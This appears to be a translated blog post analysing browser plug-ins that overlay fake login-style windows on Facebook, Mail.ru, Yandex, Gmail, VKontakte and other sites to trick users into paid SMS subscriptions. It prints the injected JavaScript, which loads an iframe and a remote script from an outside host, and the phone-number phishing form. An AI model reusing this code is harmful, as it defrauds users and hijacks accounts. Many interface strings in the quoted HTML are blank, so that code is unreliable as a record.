SMS ransomware in the form of a set of plug-ins for browsers

The other day I came across a fresh SMS ransomware in the form of a set of plug-ins for browsers. I can’t say exactly how he got on the car, but I’ll figure out what's inside. The stuff is fresh, from the fifth of this month, judging by the dates of compilation of the plugin for IE.




')
So, this infection looks like it is shown in the screenshot above. There are also variations for Facebook, Mail.ru, Yandex, Google, Rambler and classmates:





It appears in all browsers installed on the machine. When you enter the phone number, it sends an SMS from 1005, asks to answer “Yes”, which will cost the respondent 135 rubles (and, most likely, a subscription to some rubbish). Along the way, this crap is engaged in sending messages on VKontakte on behalf of the logged in user.

It is evident that the "business" began to demand some kind of quality. For each service uses its own window design. Due to the fact that everything is implemented through the browser plugin, the user sees his account in the substrate, which causes a certain degree of trust. Well, since it is no longer fashionable to write garbage in the hosts (every schoolboy already knows about this), an alternative approach has been used.





So, the set consists of plugins for Chrome, IE and FF, userscript for Opera.

Inside differ slightly. All execute roughly similar JavaScript code:

function my_addLoadEvent(func) { if(document.readyState == 'complete'){ func(); } else{ var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function() { if (oldonload) { oldonload(); } func(); } } } } var cur_url = document.location.toString(); if('https:' == document.location.protocol) { if (typeof(testInformer) === 'undefined') { var testInformer = 1; var tstImg = new Image(); tstImg.src = 'http://dreamselfprotection.net/check.php'; tstImg.onload = function(){ var ex_url = cur_url.split('/'); var the_host = ex_url[2]; if(the_host.substr(0,4) == 'www.') the_host = the_host.substr(4); var in_hosts = { 'facebook.com' : 'facebook', 'my.mail.ru' : 'mymailru', 'otvet.mail.ru' : 'mailru', 'games.mail.ru' : 'mailru', 'love.mail.ru' : 'mailru', 'news.mail.ru' : 'mailru', 'mail.ru' : 'mailru', 'e.mail.ru' : 'mailru', 'mail.yandex.ru' : 'mailyandex', 'yandex.ru' : 'mailyandex', 'ya.ru' : 'mailyandex', 'mail.google.com' : 'gmail', 'accounts.google.com' : 'gmail', 'gmail.com' : 'gmail', 'google.com' : 'gmail', 'google.ru' : 'gmail', 'vk.com' : 'vkontakte', 'vkontakte.ru' : 'vkontakte', 'odnoklassniki.ru' : 'odnoklassniki', 'rambler.ru' : 'rambler', 'mail.rambler.ru' : 'rambler', 'nova.rambler.ru' : 'rambler', 'news.rambler.ru' : 'rambler' }; if(typeof(in_hosts[the_host]) !== 'undefined'){ my_addLoadEvent(function(){ var div = document.createElement('div'); div.style.position = 'fixed'; div.style.left = '0px'; div.style.top = '0px'; div.style.zIndex = '100000'; div.style.background = '#fff'; div.style.width = '100%'; div.style.height = '100%'; div.style.opacity = '0.8'; div.style.filter = 'alpha(opacity=80)'; var innerDiv = document.createElement('div'); innerDiv.style.position = 'fixed'; innerDiv.style.left = '50%'; innerDiv.style.top = '50%'; innerDiv.style.marginLeft = '-200px'; innerDiv.style.marginTop = '-125px'; innerDiv.style.zIndex = '100001'; innerDiv.style.background = '#fff'; innerDiv.style.width = '400px'; innerDiv.style.height = '250px'; innerDiv.innerHTML = '<iframe width="100%" height="100%" frameborder="0" scrolling="no" src="http://dreamselfprotection.net/real_iframe.php?template='+in_hosts[the_host]+'&from='+the_host+'"></iframe>'; document.getElementsByTagName('body')[0].appendChild(div); document.getElementsByTagName('body')[0].appendChild(innerDiv); }); } } } } else { var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = false; sc.src = 'http://dreamselfprotection.net/iframe.php'; var b = document.getElementsByTagName('body')[0];b.appendChild(sc); } 

The code above loads the test image (apparently, just checking that the server is still alive), passing the necessary iframe parameters that it inserts over the page.

real_iframe.php is responsible for the frame contents, generating the following:

 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="styles/.css?rnd=1355016550" /> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> </head> <body> <div class="header">- </div> <div id="contentBlock"> <div class="desc_text">  ip   .     . ,      .</div> <div class="regForm"> <label for="phone" class="phoneLabel">   :</label> <input type="tel" name="phone" id="phone" class="phone" /> <input type="submit" class="regButton" value="" onclick="registration();return false;" /> <div style="clear:both"></div> <div class="example">: 79161234567</div> </div> </div> <div style="clear:both"></div> <div class="error"></div> <div class="loading">...</div> <script type="text/javascript"> function keyfunc(){ alert(window.event.keyCode); } function showError(txt) { $('.error').html(txt); $('.error').fadeIn(); setTimeout('$(".error").fadeOut()',1000); } function loading(s) { if(s == 1) { $('.loading').show(); //$('.regButton').attr('disabled', 'disabled'); } else { $('.loading').hide(); //$('.regButton').removeAttr('disabled'); } } var temp = {'phone' : ''}; var mt = 1; var loaded = 0; function registration() { var reg = new RegExp("79|89", "i"); var reg2 = new RegExp("[^0-9]", "i"); var phone_num = $('#phone').val(); var hash = 'bbfae214e1fc9e75b95d64724529eeb9'; if((phone_num.length!=11) || (reg2.test(phone_num) ==true)) { showError('   '); } else { loading(1); $.post('request.php',{'c':'reg','num':phone_num,'user':hash,'from':''},function(data){ temp.phone = phone_num; var a = jQuery.parseJSON(data); if(a.redirect) { $('#contentBlock').html('<div class="desc_text">          .</div><br/><input style="margin-left:10px;" type="button" class="regButton" value="" onclick="window.open(\''+a.redirect+'#TextBoxActivationCode\',\'\',\'toolbar=0,location=0,menubar=0,directories=0,resizable=0,scrollbars=0,width=360,height=280\');" />'); } else { if(a.success) { if(a.mo) { mt = 0; moCode(); } else { mt = 1; enterCode(phone_num); } } else { showError(a.error); } } loading(0); }); //mt = 0; //moCode(); } } function moCode() { $('#contentBlock').html('<div class="desc_text"> ,     ,      .</div>' +'<div class="regForm">' +'<label for="code" class="phoneLabel"> :</label>' +'<input type="text" name="code" id="code" class="phone" />' +'<input type="button" class="regButton" onclick="checkCode()" value="" />' +'<div style="clear:both"></div>' +'<br/><a href="#" onclick="mainWindow();return false;" class="reCodeLink">  .</a>' +'</div>'); } function enterCode(phone) { if(!phone) { phone = 79; } $('.cl_info').html('     .     .'); $('.cl_form').html('<label> : </label>' +'<input type="text" value="'+phone+'" id="phone" maxlength="11" DISABLED /><br>' +'<label>: </label>' +'<input type="text" value="" id="code" maxlength=""><br/>'); $('#controlLink').html(' .').attr('onclick','mainWindow()'); $('#mbutton').attr('onclick','checkCode()'); } function mainWindow() { $('#contentBlock').html('<div class="desc_text">  ip   .     . ,      .</div>' +'<div class="regForm">' +'<label for="phone" class="phoneLabel">   :</label>' +'<input type="tel" name="phone" id="phone" class="phone" />' +'<input type="button" class="regButton" value="" onclick="registration();return false;" />' +'<div style="clear:both"></div>' +'<div class="example">: 79161234567</div>' +'</div>'); } function checkCode() { var phone = temp.phone; var code = $('#code').val(); loading(1); $.post('request.php',{'c':'code','phone':phone,'code':code,'mt':mt},function(data){ // alert(data); var a = jQuery.parseJSON(data); if(a.success) { document.location.href = '/registered.php?secret=ReallyRegistered'; } else { showError(' '); loading(0); } }); } function rand (min, max) { var argc = arguments.length; if (argc === 0) { min = 0; max = 2147483647; } else if (argc === 1) { throw new Error('Warning: rand() expects exactly 2 parameters, 1 given'); } return Math.floor(Math.random() * (max - min + 1)) + min; } </script> <div style="display:none"> <!--LiveInternet counter--><script type="text/javascript"><!-- document.write("<a href='http://www.liveinternet.ru/click' "+ "target=_blank><img src='//counter.yadro.ru/hit?t52.6;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";"+Math.random()+ "' alt='' title='LiveInternet: number of pageviews and visitors"+ " for 24 hours is shown' "+ "border='0' width='88' height='31'><\/a>") //--></script><!--/LiveInternet--> </div> </body> </html> 

Everything is more or less transparent. The content of the window is displayed, the necessary CSS is tightened, the form is validated and, if it is valid, everything is sent to request.php , which, in fact, sends an SMS through the gate of Plastic Media LLC. Here it is worth noting two important details:

1. Implemented verification of the entered code and removing the window (not tested).
2. Statistics are kept by liveinternet.ru counter.

That is, the approach is quite solid, but there are gaps:

1. Server deployed sucks. For example, the timezone is not set, phpinfo and SSH are not closed , which quite contrasts with the more or less thoughtful code. Either the admin did just to work, or the programmer did it himself, without knowing in detail what and how it should work. In both cases, the implementer has a chance to be taken behind the ass.
2. This thing, in spite of the fact that it guaranteed to spoil the realizer with all the karma and, perhaps, a little more than karma, brings decent money. Otherwise, the developer of this crap would not have sat behind the CS6 Photoshop (not the fact that it was licensed) behind the poppy. By the way, Adobe injects unique hashes into all images. In theory, they can identify the heathens.

I don’t know what to do with all this, to be honest, but I hope it was interesting.